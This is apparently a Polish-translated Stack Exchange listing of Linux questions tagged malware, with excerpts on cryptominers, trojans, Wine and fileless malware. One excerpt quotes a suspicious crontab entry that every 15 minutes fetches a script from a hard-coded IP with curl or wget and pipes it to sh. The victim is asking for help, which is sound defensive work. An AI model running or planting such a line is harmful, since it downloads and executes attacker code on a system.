Unix & Linux malware

9

Mity na temat złośliwego oprogramowania w systemach Unix / Linux

Czy możliwe jest zainfekowanie mojego Linux-a złośliwym oprogramowaniem? Nie słyszałem o tym, żeby zdarzyło się to komuś, kogo znam, i słyszałem kilka razy, że nie jest to możliwe. Czy to prawda? Jeśli tak, o co chodzi z oprogramowaniem antywirusowym (zabezpieczającym) dla systemu Linux?

142 security malware

2

Podejrzany wpis w crontabie uruchamiający „xribfa4” co 15 minut

Chciałem dodać coś do mojego głównego pliku crontab na moim Raspberry Pi i znalazłem wpis, który wydaje mi się podejrzany, szukając części tego w Google nic nie znalazłem. Wpis Crontab: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh Zawartość http://103.219.112.66:8000/i.shto: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin mkdir …

59 security cron malware

8

Czy złośliwe oprogramowanie uruchamiane przez użytkownika bez uprawnień administratora lub sudo może zaszkodzić mojemu systemowi? [Zamknięte]

Po ostatniej włamaniu na maszynę z systemem Linux znalazłem plik wykonywalny w folderze domowym użytkownika ze słabym hasłem. Wyczyściłem wszystko, co wydaje się być wszystkimi uszkodzeniami, ale dla pewności przygotowuję pełne wyczyszczenie. Co może zrobić złośliwe oprogramowanie uruchamiane przez użytkownika niebędącego sudo lub nieuprzywilejowanego użytkownika? Czy szuka tylko plików oznaczonych …

30 security malware

2

Jak mogę zabić złośliwe oprogramowanie w instancji AWS EC2? (zainfekowany serwer)

Znalazłem złośliwe oprogramowanie w mojej instancji ec2, która stale wydobywała bitcoiny i używała mocy przetwarzania mojej instancji. Z powodzeniem zidentyfikowałem proces, ale nie byłem w stanie go usunąć i zabić. Uruchomiłem to polecenie. watch "ps aux | sort -nrk 3,3 | head -n 5" Pokazuje pięć najważniejszych procesów uruchomionych w …

26 linux process kill malware

5

Czy instalacja i używanie Wine otwiera twoją platformę Linux na wirusy Windows?

Zastanawiam się tylko, czy instalacja Wine może otworzyć dość solidny pulpit systemu Linux na świat wirusów Windows. Jakieś potwierdzone raporty na ten temat? Czy zainstalowałbyś wtedy program antywirusowy dla systemu Windows w Wine?

23 security emulation windows malware

4

Jak wykryć i usunąć trojana Linux?

Niedawno (ponownie) natknąłem się na to: Trojan Linux pozostaje niezauważony przez prawie rok (Unreal IRCd) Tak, wiem, że dodanie losowego PPA / oprogramowania z niezaufanego źródła wymaga problemów (lub gorzej). Nigdy tego nie robię, ale wielu tak robi (wiele blogów i tabloidów na Linuksie promuje dodawanie PPA do fantazyjnych aplikacji, …

16 security malware

1

Jak stwierdzić, czy tajemnicze programy na liście Nethogs są złośliwym oprogramowaniem?

Oto, co widzę w Nethogs: Martwię się o aukcje z PID ?, działające jako root. Jak mogę się dowiedzieć, co to jest? Używam Linux Mint 14. Daj mi znać, jakie inne informacje powinienem dołączyć.

12 networking malware

2

Jak działa złośliwe oprogramowanie bez plików w systemie Linux?

Rozumiem definicję złośliwego oprogramowania bez plików: Szkodliwy kod, który nie jest oparty na plikach, ale istnieje tylko w pamięci… W szczególności złośliwy kod bez plików… dołącza się do aktywnego procesu w pamięci… Czy ktoś może wyjaśnić, jak działa to dołączanie do aktywnego procesu w pamięci? Ponadto, jaka ochrona (jądro) / …

10 process linux-kernel malware

Pytania otagowane jako malware